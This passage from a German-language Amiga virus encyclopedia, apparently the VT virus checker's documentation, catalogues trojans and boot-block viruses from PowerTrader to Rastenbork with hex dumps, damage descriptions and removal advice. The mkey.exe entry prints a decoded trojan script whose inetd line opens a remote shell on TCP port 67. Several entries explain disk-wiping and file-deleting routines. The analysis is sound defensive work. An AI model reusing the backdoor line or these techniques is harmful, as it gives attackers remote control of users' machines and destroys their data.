  3449.       Die Codier-Routine entspricht aufs Byte der Routine von
  3450.       Port-1599-Trojan.
  3451.       VT bietet loeschen an. 
  3452.       Filename: mkey.exe  L: 1880 Bytes
  3453.       Nach File-ID:
  3454.         .--------------------------------------.
  3455.         |So rumour has it Holger has released a|
  3456.         |virus to harm users with fake miami   |
  3457.         |keyfiles. This will check your keys to|
  3458.         |ensure its safe to use, dEN saves ya  |
  3459.         |and fists Holgers ass!                |
  3460.         `--------------------------------------'
  3461.             }-- dEN 3/3/98   pHuKeRs --{
  3462.       Im File ist uncodiert zu lesen:   
  3463.           01014e75 24564552 3a202d4d 69616d69 ..Nu$VER: -Miami
  3464.           204b6579 2046696c 65205661 6c696461  Key File Valida
  3465.           746f7220 76312e30 2d20a964 454e5e70 tor v1.0- .dEN^p
  3466.           484b2069 6e203139 39380a00          HK in 1998..
  3467.       mkey.exe enthaelt einen mehrfach-codierten Bereich.
  3468.       Im Speicher entsteht:   
  3469.           00000070 2f2a202a 2f0a2020 20205361 ...p/* */.    Sa
  3470.           79202727 0a202020 20536179 20274d69 y ''.    Say 'Mi
  3471.           616d6920 4b657966 696c6520 56616c69 ami Keyfile Vali
  3472.           6461746f 7220a96f 44654420 62792064 dator .oDeD by d
  3473.           454e5e50 486b2031 39393827 0a202020 EN^PHk 1998'.
  3474.           20536179 2027270a 20202020 53617920  Say ''.    Say
  3475.           27527566 662c2062 75742066 69727374 'Ruff, but first
  3476.           20746f20 63686563 6b21270a 0a6f7065  to check!'..ope
  3477.           6e282773 63726970 74272c27 456e7641 n('script','EnvA
  3478.           72633a4d 69616d69 6368616e 67654442 rc:MiamichangeDB
  3479.           272c2757 27290a77 72697465 6c6e2827 ','W').writeln('
  3480.           73637269 7074272c 27414444 20696e65 script','ADD ine
  3481.           74642064 61792073 74726561 6d207463 td day stream tc
  3482.           7020646f 73206269 6e205072 74206e65 p dos bin Prt ne
  3483.           77636c69 20746370 3a363727 290a636c wcli tcp:67').cl
  3484.           6f736528 27736372 69707427 290a0a49 ose('script')..I
  3485.           46204f50 454e2827 74686572 65272c27 F OPEN('there','
  3486.           6d69616d 693a4d69 616d692e 6b657931 miami:Miami.key1
  3487.           272c2752 27290a54 48454e20 63686563 ','R').THEN chec
  3488.           6b322829 0a454c53 45205361 79202727 k2().ELSE Say ''
  3489.           0a202020 20536179 20274b65 79203120 .    Say 'Key 1
  3490.           69732062 6164206f 72206e6f 6e206578 is bad or non ex
  3491.           69737461 6e74270a 20202020 53617920 istant'.    Say
  3492.           27446964 20796f75 206d616b 65206120 'Did you make a
  3493.           4d69616d 693a2061 73736967 6e20746f Miami: assign to
  3494.           20796f75 72206b65 79733f27 0a202020  your keys?'.
  3495.           20536179 2027270a 45786974 0a0a6368  Say ''.Exit..ch
  3496.           65636b32 3a0a4946 204f5045 4e282774 eck2:.IF OPEN('t
  3497.           68657265 32272c27 6d69616d 693a4d69 here2','miami:Mi
  3498.           616d692e 6b657932 272c2752 27290a54 ami.key2','R').T
  3499.           48454e20 646f6e65 28290a45 4c534520 HEN done().ELSE
  3500.           53617920 27270a20 20202053 61792027 Say ''.    Say '
  3501.           4b657920 32206973 20626164 206f7220 Key 2 is bad or
  3502.           6e6f6e20 65786973 74616e74 270a2020 non existant'.
  3503.           20205361 79202742 65747465 7220676f   Say 'Better go
  3504.           20616e64 20676574 20736f6d 65746869  and get somethi
  3505.           6e672062 65747465 7221270a 20202020 ng better!'.
  3506.           53617920 27270a45 7869740a 0a646f6e Say ''.Exit..don
  3507.           653a0a53 61792027 270a5361 7920272b e:.Say ''.Say '+
  3508.           2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
  3509.           2d2d2d2d 2d2b270a 53617920 277c3d2d -----+'.Say '|=-
  3510.           3d2d4b65 79732061 72652066 696e652d =-Keys are fine-
  3511.           3d2d3d7c 270a5361 7920272b 2d2d2d2d =-=|'.Say '+----
  3512.           2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
  3513.           2d2b270a 65786974 0a0a7265 7475726e -+'.exit..return
  3514.           20310000                             1..
  3515.       Fremdaussage (Danke):
  3516.       Die kritische Zeile ist:
  3517.       writeln('script','ADD inetd day stream tcp dos bin Prt newcli tcp:67')
  3518.       Das führt dazu, daß die Einstellungen von Miami geändert werden und
  3519.       jedesmal beim Start ein neues CLI geöffnet wird. Dieses wird nicht mit
  3520.       CON: verknüpft sondern mit TCP: Port 67
  3521.       Die Texte zu key1 und 2 sind nur eine Ablenkausgabe, OHNE Aussage-
  3522.       kraft.
  3523.       siehe auch Port-1599-Trojan
  3524.  
  3525.  
  3526.    - POWERBOMB  ByteBandit/Forpib-Clone    s.o.
  3527.          Text: POWERBOMB SYSTEMS PRESENTS: BYTE BANDIT V2.0 !!!
  3528.  
  3529.    - PowerTeam  BB    KickTag, KickCheckSum, BeginIo
  3530.                nicht mit KS2.04
  3531.                Teile des BB's codiert mit eor.w d1,(a0)+
  3532.                Schaeden:
  3533.                - Sobald die Zaehlzelle den Wert $a erreicht hat,
  3534.                  Textausgabe mit DisplayAlert und dann bei mir
  3535.                  Absturz. Text:
  3536.                   Virus Meditation #0026051990.PowerTeam
  3537.  
  3538.    - pOWERtRADER-Troj.    Zerstoerung
  3539.          Name: vom Filenamen uebernommen angeblich V2.5
  3540.          Laenge gepackt:    5324 Bytes
  3541.          Laenge ungepackt: 48388 Bytes
  3542.          Keine verbogenen Vektoren
  3543.          Keine Vermehrung
  3544.          Im File ist zu lesen:
  3545.             ffe84e75 73637369 2e646576 69636500 ..Nuscsi.device.
  3546.                 ;....
  3547.             48414841 48414841 48414841 48414841 HAHAHAHAHAHAHAHA
  3548.             48414841 48414841 48414841 48414841 HAHAHAHAHAHAHAHA
  3549.          Schaden:
  3550.          Es wird scsi.device Unit 0 geoeffnet und mit SendIo Muell
  3551.          (HAHA s.o.) in einer Schleife ab Block 0 (RIGID) geschrieben.
  3552.          VT bietet loeschen an.
  3553.  
  3554.  
  3555.    - PP-Bomb   Powerpacker, File-Trojan, keine Vermehrung, Vers.Nr. 3.2
  3556.       - 3 Programmteile
  3557.          - kurzer CodeHunk mit 2 jsr-Befehlen (notwendig fuer Ablauf)
  3558.          - crunched Bomb-Teil
  3559.          - Powerpacker 3.0b (ich glaube: NICHT veraendert und nicht ge-
  3560.                              crunched)
  3561.       Bomb-Teil:
  3562.       wird zuerst angesprungen, decrunched Laenge: 9880 Bytes
  3563.       Aztec-Prg mit dt. Fehlermeldungen (z.B. Fehler bei DISKFONTBASE)
  3564.       - sucht zuerst SnoopDos-Task; falls ja Bomb-Ende
  3565.       - sucht in c von dh0: und/oder dh1: nach why und setzt das File
  3566.         auf 0 Bytes
  3567.       - enthaelt alle Dos-Befehle um Files zu veraendern (sucht auch
  3568.         auf dh0: und dh1:, ist getestet).
  3569.       - soll AmiExpress veraendern (hab ich nicht)
  3570.       - weitere Eintraege: BBS: DH0:BBS/ DH1:BBS/ DH0: DH1:
  3571.       Ursprung:
  3572.                   qtx_pow.lzh       139670 Bytes
  3573.       Empfehlung:  (s.u.)
  3574.         loeschen und Original-Powerpacker aufkopieren
  3575.       Nachtrag 29.12.92: Es wurde mir ein weiteres verseuchtes File
  3576.         zugeschickt.  Name: snap   Laenge: 44260 Bytes
  3577.         Daraufhin wurden die Linkversuche mit PP wiederholt und mit
  3578.         snap neu durchgefuehrt. An beide Files kann sich der PP-Bomb-
  3579.         Teil  NICHT  von selbst linken. Es hat also jemand nachgehol-
  3580.         fen.
  3581.       Nachtrag 30.12.92: Es wurde in VT eine PP-Bomb-Ausbauroutine
  3582.         eingebaut. Diese Routine koennte wackeln. Fertigen Sie BITTE
  3583.         deshalb VOR dem Ausbauversuch ein Kopie an. Testen Sie nach
  3584.         dem Ausbau bitte die Lauffaehigkeit des verkuerzten Programms.
  3585.         Danke
  3586.       Nachtrag 16.02.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3587.         Haengt an Died. Died verseucht Laenge: 67028 Bytes
  3588.         Ausgabe: PP-Bomb 2
  3589.         Besonderheit: Das PP-Bomb-Trojan-Teil wurde in der Laenge ge-
  3590.         kuerzt !!! Da im gepackten Teil eine Hunk-Kennung von $3EA auf
  3591.         $3E9 geaendert wurde, besteht Absturzgefahr ???? (2.Start von
  3592.         verseuchtem Died auf A4000 = GURU)
  3593.         Erkennung und Ausbau mit VT getestet: 16/17.02.93
  3594.       Nachtrag 17.02.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3595.         Haengt an MegaMon. MegaMon verseucht Laenge: 26856 Bytes
  3596.         Ausgabe: PP-Bomb 3
  3597.         Besonderheit: Das PP-Bomb-Trojan-Teil wurde in der Laenge ge-
  3598.         kuerzt !!!
  3599.         Erkennung und Ausbau mit VT getestet: 17.02.93
  3600.       Nachtrag 10.12.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3601.         Haengt an Died V2.8 .
  3602.         Died V2.8 verseucht UND gepackt Laenge: 31320 Bytes
  3603.         Besonderheit: Es handelt sich um das verseuchte Died-Prg. (s.o.).
  3604.         Die ASCII-Version wurde erhoeht, der PP-Bomb-Teil mit $4eb9 ange-
  3605.         linkt und dann das ganze File noch gepackt.
  3606.         VT bietet loeschen an.
  3607.         Wenn Sie das Died-Prg. V2.8 umbedingt haben wollen (es ist wirk-
  3608.         lich nur ein ASCII-Fake), so entpacken Sie bitte das Prg. Danach
  3609.         bietet VT Ausbau an.
  3610.         Died V2.8 Virusteil ausgebaut Laenge: 61692 Bytes
  3611.         Erkennung und Ausbau mit VT getestet: 10.12.93
  3612.       Nachtrag 25.12.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht.
  3613.         Haengt an ModuleMaster V1.7 .
  3614.         ModuleMaster verseucht Laenge :    20364 Bytes
  3615.         ModuleMaster Virusteil ausgebaut : 15108 Bytes
  3616.         Ausgabe: PP-Bomb 4
  3617.         Erkennung und Ausbau mit VT getestet: 25.12.93
  3618.       PP-Bomb-Virusteil entpackt Auszug:
  3619.                                       42425300             BBS.
  3620.            44483000 44483100 44483000 44483100 DH0.DH1.DH0.DH1.
  3621.            4242533a 00444830 3a424253 2f004448 BBS:.DH0:BBS/.DH
  3622.            313a4242 532f0044 48303a00 4448313a 1:BBS/.DH0:.DH1:
  3623.             ......
  3624.                     536e6f6f 70446f73 00433a57 `...SnoopDos.C:W
  3625.            68790077                            hy.w
  3626.  
  3627.    - PP veraendert
  3628.         VT glaubt einen PP-Hunk gefunden zu haben, bei dem die Hunk-
  3629.         laenge ($83, $9E) NICHT stimmt. Es kann auch eine FEHLMELDUNG
  3630.         sein !!!!
  3631.         Schauen Sie sich bitte das File etwas genauer an, ob nicht
  3632.         ein unbekanntes Teil nach dem Entpackheader (aber vor dem Data-
  3633.         Hunk) eingebaut wurde.
  3634.  
  3635.    - PRIMAVERA-Virus   BB    EXTREME-Clone  siehe oben
  3636.         Nur Text geaendert. Im BB ist zu lesen:
  3637.            696f6e2e 6c696272 61727900 00b01554 ion.library....T
  3638.            68652052 65747572 6e206f66 20507269 he Return of Pri
  3639.            6d612056 65726120 56697275 73212121 ma Vera Virus!!!
  3640.  
  3641.    - PROMOTER Virus  Laenge: 1848 Bytes
  3642.         Name: Disk-Validator
  3643.         KS1.3: ja   KS2.04: nein  Disk-Validator im ROM
  3644.         Resetfest: nein
  3645.         Verbogene Vektoren: nein
  3646.         Block-Codier-Routine: nein
  3647.         Originalfunktion wird NICHT erfuellt.
  3648.         Meldet sich nach Vermehrung mit DisplayAlert und fordert zum
  3649.         Wechsel auf KS2.04 auf. Muesste also SOFORT auffallen.
  3650.         Im File ist zu lesen:
  3651.            79006466 303a6c2f 6469736b 2d76616c y.df0:l/disk-val
  3652.            69646174 6f720000 00281120 20202020 idator...(.
  3653.            20202020 20202049 20616d20 74686520        I am the
  3654.            4b69636b 73746172 7420322e 30202d20 Kickstart 2.0 -
  3655.            50524f4d 4f544552 202d2056 69727573 PROMOTER - Virus
  3656.  
  3657.    - Pstats-Virus  File  Laenge ungepackt: 19784 Bytes
  3658.         GFA-Basic-Programm. Keine verbogenen Vektoren
  3659.         Zielgerichtet gegen PHOBOS. Ein Mailbox-Programm (kenne ich nicht).
  3660.         Bleibt nicht im Speicher. Von der Definition ein reines Zer-
  3661.         stoerungsprogramm und kein Virus, da keine Vermehrung. Also KEINE
  3662.         Gefahr fuer "normale" Amiga-User. Es wird nach einigen Filenamen
  3663.         gesucht und dann deren Inhalt mit Speichermuell ueberschrieben.
  3664.               S:PHOBOS.CONF
  3665.               NETZCONFIG
  3666.               BRETTERCONFIG
  3667.               USERCONFIG
  3668.         Einige der oben genannten Filenamen werden auch noch mit der Er-
  3669.         weiterung .TAPO, .BAK, .CONF1 usw. gesucht. Nach der Zerstoerungs-
  3670.         arbeit wird also das Mailboxsystem nicht mehr laufen.
  3671.         Empfehlung: loeschen
  3672.         Es gibt da nichts auszubauen, da das Virusteil IM GFA-Teil sitzt.
  3673.         Der Programmierer MUSS also den sourcecode von pstats besitzen.
  3674.         Zumindestens ist mir kein Recompiler fuer GFA-Basic bekannt.
  3675.  
  3676.  
  3677.    - Pseudoselfwriter   andere Namen: Selfwriter, siehe bei Lamer
  3678.  
  3679.    - Purge-Inst.    File
  3680.         Laenge gepackt:   9812 Bytes
  3681.         Laenge ungepackt: 14864 Bytes
  3682.         KEINE verbogenen Vektoren
  3683.         Original-Name des Files unbekannt.
  3684.         Duerfte in E geschrieben sein.
  3685.         Da keiner freiwillig so ein File startet, vermute ich dass das
  3686.         File in die startup-sequence einer Spiele-Disk oder so aehnlich
  3687.         eigebaut ist.
  3688.         Ablauf:
  3689.         Nach folgenden LWen wird gesucht:
  3690.         DH0, DH1, DH2, DH3, HD0, HD1, HD2, HD3, DF0, DF1, DF2, DF3, A
  3691.         und B.
  3692.         In das C-Verzeichnis und in das WBStartup-Verzeichnis (Falls vor-
  3693.         handen wird ein GEPACKTES File mit dem Namen Purge geschrieben.
  3694.         In die startup-sequence und in die User-Startup (falls vorhanden)
  3695.         wird die Zeile  Run >NIL: Purge  eingefuegt.
  3696.         Beim naechsten Reset wird also IMMER das Purge-Trojan-Teil aufge-
  3697.         rufen.
  3698.  
  3699.    - Purge-Trojan  File
  3700.         Laenge gepackt:   5300 Bytes
  3701.         Laenge ungepackt: 14776 Bytes
  3702.         Das File liegt in C und/oder in WBStartup (s.0.)
  3703.         Ablauf:
  3704.         Nach Aufruf wird das Purge-Trojan-File ueberschrieben mit einem
  3705.         UNGEPACKTEN Purge-File, das nur noch 5212 Bytes lang ist. (Text-
  3706.         ausgabe).
  3707.         Danach begibt sich der Prozess in ein Delay :
  3708.               move.l #$7BC,D0
  3709.               muls.w #$32,D0    (bei mir rund 33 Minuten)
  3710.         Sobald die Zeit abgelaufen ist, wird mit Dos-Befehlen (examine usw.)
  3711.         nach Icons gesucht.
  3712.         Diese Icons werden durch ein neues Icon (Laenge: 2164 Bytes) ersetzt.
  3713.         Dieser Vorgang MUESSTE normal auffallen. Probieren Sie einen
  3714.         Tastatur-Reset. Die Festplatte wird beim naechsten Aufruf wieder
  3715.         validiert. Ja man soll das nicht machen, aber es ist die einzige
  3716.         Moeglichkeit eines Abbruchs.
  3717.         Wenn Sie das Programm weiterarbeiten lassen, so erscheint danach
  3718.         fuer etwa eine Minute ein gadgetloses Fenster mit Text:
  3719.  
  3720.           Friend of Terminator is there !!!
  3721.           ANTIPIRAT
  3722.           Power of Destroying !!!
  3723.           My ultimate answer against all the fucking softwarepirats !
  3724.           Hi Anatol,Cycledom,Primitive,Bj.rn,Dead Homer,Brian,
  3725.           Gigant,Termination 8,Hardball & Slimeck.
  3726.           Worked on all available devices...!
  3727.           Ready....
  3728.  
  3729.         Schaeden:
  3730.         Wenn Sie nun das entsprechende Laufwerk oeffnen, werden Sie nur
  3731.         noch ein Icon sehen, da alle uebereinander liegen. Im Icon koen-
  3732.         nen Sie lesen:    FUCKING
  3733.                           SOFTWARE
  3734.                              PIRAT
  3735.         Da das Icon vom Typ Project ist, koennen keine Programme mehr
  3736.         ueber Icon gestartet werden.
  3737.         VT2.68 sollte den Prozess finden und versucht ihn abzuschalten
  3738.         (GURU-Gefahr !!).
  3739.         VT2.68 sollte die drei Purge-File-Typen erkennen und bietet
  3740.         loeschen an.
  3741.         Das entstehende Purge-Icon sollte auch erkannt werden, aber der
  3742.         Versuch 100 Icons mit VT zu loeschen, ist zu langsam. Nehmen Sie
  3743.         hierfuer ein Directory-Tool.
  3744.         Die Programme auf meiner Test-Partition waren noch brauchbar,
  3745.         halt ohne Icon.
  3746.  
  3747.    - PVL.BB   (L)
  3748.         Nach meiner Meinung NIE lauffaehig. Warum er dann doch hier
  3749.         steht. Weil dieser BB als Virus weitergegeben wird und damit
  3750.         die Erbsenzaehler eine Ruhe geben. Ich habe auf jeder Maschine
  3751.         nur den GURU gesehen und wenn man versucht den BB zu re-
  3752.         assemblieren, sieht man auch warum.
  3753.         Versucht durch Text zu taeuschen:
  3754.            00261054 68697320 4469736b 20497320 .&.This Disk Is
  3755.            6e6f7420 496e6665 63746564 20427920 not Infected By
  3756.            416e7920 4b696e64 204f6620 56697275 Any Kind Of Viru
  3757.            73204974 73204f6b 61792021 00010012 s Its Okay !....
  3758.            204c6566 74204d6f 75736542 7574746f  Left MouseButto
  3759.            6e3a2043 6f6e7469 6e756520 776f726b n: Continue work
  3760.            202c2052 69676874 204d6f75 73654275  , Right MouseBu
  3761.            74746f6e 3a204272 65616b20 20200000 tton: Break   ..
  3762.            00341054 68697320 6469736b 20697320 .4.This disk is
  3763.            6f6b6179 20636f6e 74696e75 65207769 okay continue wi
  3764.            74682079 6f757220 776f726b 696e6720 th your working
  3765.            20200001 0012204c 65667420 4d6f7573   .... Left Mous
  3766.            65427574 746f6e3a 20436f6e 74696e75 eButton: Continu
  3767.            6520776f 726b202c 20526967 6874204d e work , Right M
  3768.            6f757365 42757474 6f6e3a20 42726561 ouseButton: Brea
  3769.            6b202020 0000ffff ffffffff ffffffff k   ............
  3770.  
  3771.  
  3772.    - QRDL V1.1  Link verlaengert ein File um 2320 Bytes
  3773.      Vermehrung nur gelungen mit KS1.3 und Chip 512 kein Fastmem
  3774.      KS37.300 (A600) : immer GURU 3
  3775.  
  3776.          Haengt sich als 1.Hunk (neuer) ein.
  3777.          Zuerst gefunden an: PPLoadSeg  Laenge verseucht: 3484 Bytes
  3778.          Namensbegruendung: nach eor.b d5,(a0)+ ist im Speicher zu
  3779.          lesen:
  3780.            00000000 28432931 3939322D 30342D31 ....(C)1992-04-1
  3781.            36205152 444C2E20 52656C65 61736520 6 QRDL. Release
  3782.            312E3120 426F726E 20696E20 506F6C61 1.1 Born in Pola
  3783.            6E642C20 47727420 746F204A 61636B20 nd, Grt to Jack
  3784.          Verbogene Vektoren je nach Aktivierungsstand:
  3785.            Cool, DoIo, NewOpenLib, OpenWindow, $78(a6)->,
  3786.          Schaden A:
  3787.            Sucht den BitMapBlock einer Disk und gibt alle Bloecke
  3788.            frei. Fehler konnte erzeugt werden.
  3789.          Schaden B:
  3790.            Linkt sich an das erste File der startup-sequence.
  3791.            Mit KS1.3 (s.o.) gelungen
  3792.  
  3793.            Speichererkennung getestet:        20.11.92
  3794.            Fileerkennung und Ausbau getestet: 20.11.92
  3795.        Hinweis: Sie muessen auf Aufforderung PPLOADSeg loeschen,
  3796.            sonst besteht die Gefahr, dass VT den QRDL im Speicher
  3797.            uebersieht. Ich wiederhole mich ungern, aber noch einmal:
  3798.            Fuer einen sinnvollen Filetest mit VT  MUSS!!!! der Speicher
  3799.            sauber sein. Dies gilt nicht nur fuer QRDL, sondern allge-
  3800.            mein.
  3801.  
  3802.    - RAF-Virus  BB  WARHAWK-Clone  s.u.
  3803.            Nur Text geaendert. Eine Meisterleistung
  3804.            Im BB ist zu lesen:
  3805.            4b54494f 4e2e2020 20204120 56495255 KTION.    A VIRU
  3806.            53204120 44415920 4b454550 53205448 S A DAY KEEPS TH
  3807.            4520424f 4f54424c 4f434b53 20415741 E BOOTBLOCKS AWA
  3808.            59212121 21212120 20205241 46002c28 Y!!!!!!   RAF.,(
  3809.          Hinweis: Das Programm sichert den Bereich ab $7E600 NICHT.
  3810.          D.h. ein anderes Prg. z.B. VT kann genau an diese Stelle
  3811.          geladen werden. Da der verbogene Coolzeiger in der Exec
  3812.          liegt und dieser Bereich ja geschuetzt ist, kann es zur Aus-
  3813.          gabe "unbekanntes Prg" kommen. Mit 5 MB wurde dieses Virusteil
  3814.          im Speicher richtig erkannt, aber natuerlich bleibt unter KS1.3
  3815.          bei dieser Speichergroesse, nach einem RESET das Prg. nicht er-
  3816.          halten und eine Vermehrung ist ueber DoIo nicht moeglich.
  3817.  
  3818.  
  3819.    - Random Access      CopperIntro
  3820.          schreibt GURU nach $60, nicht resident, keine Vermehrung
  3821.          Empfehlung: sofort loeschen
  3822.          von der Definition KEIN Virus, aber schaedlich wg. $60
  3823.  
  3824.  
  3825.    - Rastenbork-Inst.   File
  3826.          Laenge gepackt:   5220 Bytes
  3827.          Laenge ungepackt: 8640 Bytes
  3828.          KEINE verbogenen Vektoren
  3829.          Sofort Loeschen
  3830.          Erlaubt das Anlegen von zwei BB-Viren (s.u.)
  3831.          Im File ist zu lesen:
  3832.              54684520 72415354 656e624f 726b2069 ThE rASTenbOrk i
  3833.              4e735441 6c6c6572 20627920 50655065 NsTAller by PePe
  3834.              2f745253 69005669 72757349 6e666f00 /tRSi.VirusInfo.
  3835.  
  3836.     - Rastenbork-Virus  BB
  3837.          Typ A:          (Rastenborg)
  3838.          Version: 1.2
  3839.          Verbogene Vektoren: Cool, DoIo
  3840.          Resetfest.
  3841.          Fordert trackdisk.device NICHT .
  3842.          Im BB ist zur Taeuschung uncodiert zu lesen:
  3843.              69627261 72790042 6f6f7420 56697275 ibrary.Boot Viru
  3844.              73205072 6f746563 746f7220 76352e34 s Protector v5.4
  3845.              00566563 746f7273 2077726f 6e672100 .Vectors wrong!.
  3846.              426f6f74 20636f6e 7461696e 73205343 Boot contains SC
  3847.              4120286f 72207369 6d696c61 72292076 A (or similar) v
  3848.              69727573 20210043 6f6c6400 436f6f6c irus !.Cold.Cool
  3849.              00446f49 4f206368 616e6765 64210041 .DoIO changed!.A
  3850.              204e5053 2070726f 64756374 696f6e2e  NPS production.
  3851.          Schaeden:
  3852.          a) Vermehrt sich ueber BB.
  3853.          b) Sobald eine Zaehlzelle den Wert $B erreicht hat, wird
  3854.             ein Block mit Muell gefuellt. Der Block ist NICHT zu
  3855.             retten. Versuchen Sie mit DiskSalv2 etwas zu retten.
  3856.             Danach wird ein BB-Teil mit mit EOR.L D1,D0 decodiert
  3857.             und mit DisplayAlert ausgegeben:
  3858.           ­­ Meet your new friend,The Rastenborg Virus v1.2 ­­
  3859.              Congratulations! Disk in drive is unprotected.
  3860.           It probably has no more root block,but who cares...
  3861.         ALL thanksgiving services please send to PePe/?"???????
  3862.                                            Poland,Ketrzyn,1994.04.08
  3863.                                                    .
  3864.          Hinweis: Der Programmierer schreibt hier Rastenborg, also "g".
  3865.  
  3866.          Typ B:      (rAStENboRk)
  3867.          Version: 2.0
  3868.          Verbogene Vektoren: Cool, DoIo
  3869.          Resetfest.
  3870.          Fordert trackdisk.device NICHT .
  3871.          Im BB ist zur Taeuschung uncodiert zu lesen:
  3872.              50616e7a 65722074 6f74616c 20616e74 Panzer total ant
  3873.              69207669 72757320 73797374 656d0056 i virus system.V
  3874.              69727573 20646573 74726f79 65642100 irus destroyed!.
  3875.          Schaeden:
  3876.          a) Vermehrt sich ueber BB.
  3877.          b) Sobald eine Zaehlzelle den Wert $B erreicht hat, soll
  3878.             mit add.b #7 ein Bereich ab $6E000 auf einer Laenge
  3879.             von $6400 veraendert werden. $6E000 ist nur bei einer
  3880.             DD-Disk der Root-Zylinder.
  3881.             Vorher  Block:    880
  3882.           0000: 00000002 00000000 00000000 00000048 ...............H
  3883.           0010: 00000000 1d397726 00000000 00000000 .....9w&........
  3884.             usw.
  3885.             Nachher Block:    880
  3886.           0000: 07070709 07070707 07070707 0707074f ...............O
  3887.           0010: 07070707 24407e2d 07070707 07070707 ....$@~-........
  3888.             usw.
  3889.           Dieser Bereich koennte also "rueck-codiert" werden.
  3890.             Danach wird ein BB-Teil mit mit EOR.L D1,D0 decodiert
  3891.             und mit DisplayAlert ausgegeben: 
  3892.               rAStENboRk cAShEr vIRUs v2.0
  3893.                ...another Christmas`94 present!
  3894.               Your disk isn't damaged,but it has just been coded.
  3895.               Try to find coding routine.
  3896.               If got any problems,contact Santa Claus
  3897.               or just PePe/tRSi
  3898.               Bonus disks are welcome!
  3899.           Der Programmierer schreibt hier Rastenbork, also "k".
  3900.           Hinweis 2: Falls in VT-RootBlock "von rAStENboRk cod." ange-
  3901.           zeigt wird brechen Sie bitte ab. Gehen Sie in VT-Prefs und
  3902.           schalten Sie den Sicherheitsrequester ab. Testen Sie dann
  3903.           die Disk mit BlockItest. Von Block 880-929 wird Ihnen dann
  3904.           Decode angeboten. (Ja das dauert, aber eine unwichtige Disk
  3905.           koennen Sie auch gleich neu formatieren.) VT wird den BitMap-
  3906.           Block der wahrscheinlich auch im codierten Bereich liegt,
  3907.           NICHT finden. Sobald der BlockITest fertig ist, entnehmen Sie
  3908.           die Disk fuer kurze Zeit. Beim Neueinlegen sollte der BitMap-
  3909.           Block vom Betriebssystem in Ordnung gebracht werden, hoffe
  3910.           ich. Diese Disk sollten Sie noch einmal allen Tests unterziehen.
  3911.           Auch BlockKette !!!!
  3912.           Hinweis 3: Bei einigen Versuchen wurde nicht nur der Rootbereich
  3913.           codiert, sondern auch auch der BB mit Muell gefuellt. Spielen
  3914.           Sie bitte in so einem Fall ZUERST mit VT einen DOS0-BB auf die
  3915.           Disk. Danke
  3916.  
  3917.  
  3918.    - RDB Formatter 2 Virus
  3919.          Mit diesem Namen erkennt ein anderes Antivirusprogramm Files,
  3920.          die vom GlobVec144-LVirus veraendert wurden. NUR !!!! Der
  3921.          GlobVec144-LVirus enthaelt KEINE Rigid-Format-Routine !!!!!
  3922.          siehe bei GlobVec144-LVirus
  3923.          Stand: 97-03-28
  3924.  
  3925.  
  3926.    - Red October V1.7  Link   Name im Prg nicht nachvollziehbar
  3927.          auch KS2.04, Laenge Ursprungsfile ungepackt: 1296 Bytes
  3928.          keine verbogenen Vektoren, schnelle Vermehrung (20min eine
  3929.          Disk komplett verseucht). Haengt sich vor den ersten Hunk
  3930.          und verlaengert das File um 1296 Bytes. In einem verseuchten
  3931.          File ist um $500 zu lesen: timer.device, dos.library, ram:
  3932.          ram:1 . Virus meldet sich NIE. Manche verseuchten Files ver-
  3933.          suchten zwar noch erfolgreich eine Vermehrung, aber bei Aus-
  3934.          fuehrung des eigentlichen Prg.s GURU. VT versucht auch diese
  3935.          Files retten.
  3936.       Schaeden in Abhaengigkeit von der Computer-Systemzeit:
  3937.             Computer-Sekunden teilbar durch 3 = Vermehrungsversuch
  3938.             Computer-Sekunden teilbar durch 16 = RESET
  3939.         Vermehrungsbedingungen:
  3940.          - nur bei Aufruf eines verseuchten Files
  3941.          - sucht mit lock, info, examine, exnext andere Files
  3942.          - testet auf Schreibschutz (#80)
  3943.          - File ausfuehrbar ($3F3)
  3944.          - File kleiner #50000
  3945.          - File noch nicht befallen
  3946.          - KEIN Test auf Disk voll
  3947.       VT-Test: 27.03.92  Ursprungsfile wird geloescht (da gibt es
  3948.           nichts auszubauen).
  3949.           Aus verseuchten Files (auch GURU-Files s.o.) wird Link aus-
  3950.           gebaut. ALLE Files waren wieder im Originalzustand und voll
  3951.           lauffaehig.
  3952.  
  3953.    - RedGhost-AV (L)   BB
  3954.         s.u. bei Antivirus-BB
  3955.  
  3956.    - Registrator-Virus  File  s.o. bei AeReg.BBS-Trojan
  3957.  
  3958.    - Rel 01.28 Virus   File  s.o. DOOR_BELLS-Virus
  3959.  
  3960.    - Rene    siehe bei Lamer
  3961.         da im entschluesselten Programm The LAMER Ex... zu lesen ist und
  3962.         das Verhalten einem Lamervirus entspricht, halte ich eine
  3963.         Zuordnung zur Lamer-Gruppe fuer richtig.
  3964.  
  3965.    - ReOrgIt-Troj.    (Zerstoerung)
  3966.         Archivname: REORGIT.LHA    L: 52279 Bytes
  3967.         Filename:   ReOrgIt.exe    L: 60732 Bytes
  3968.         Fundort (inzwischen geloescht) : Aminet/util/wb
  3969.         Ein AMOS-Programm
  3970.         Im File ist zu lesen:
  3971.           68652e2e 2e000002 733a0010 73746172 he......s:..star
  3972.           7475702d 73657175 656e6365 000c5573 tup-sequence..Us
  3973.           65722d73 74617274 75700003 2a2e2a00 er-startup..*.*.
  3974.           000c4e6f 77207265 6f726769 6e670008 ..Now reorging..
  3975.           4861636b 46696c65 001a4841 48414841 HackFile..HAHAHA
  3976.           2c20796f 75722048 44206973 20737475 , your HD is stu
  3977.           66666564 00125375 636b6564 20696e20 ffed..Sucked in
  3978.           61727365 686f6c65 00124561 74207368 arsehole..Eat sh
  3979.           69742064 69636b20 68656164 000e5072 it dick head..Pr
  3980.           65706172 6520746f 20444945 000b416c epare to DIE..Al
  3981.           6c20446f 6e652e2e 2e000000          l Done......
  3982.         Schaden:
  3983.         Loescht s:startup-sequence und s:User-startup
  3984.         Soll loeschen: s:*.* (bei mir nicht)
  3985.         VT bietet Loeschen an.
  3986.  
  3987.  
  3988.    - REP-Virus    SCA-Clone  nur Text geaendert
  3989.           32165468 65204d65 67612d4d 69676874 2.The Mega-Might
  3990.           79205245 50202121 dc6e0000 4ef90000 y REP !!.n..N...
  3991.           00004121 52455021 52455021 52455021 ..A!REP!REP!REP!
  3992.  
  3993.    - Return Of The Lamer       PrgFileVirus    Laenge 1848 Bytes
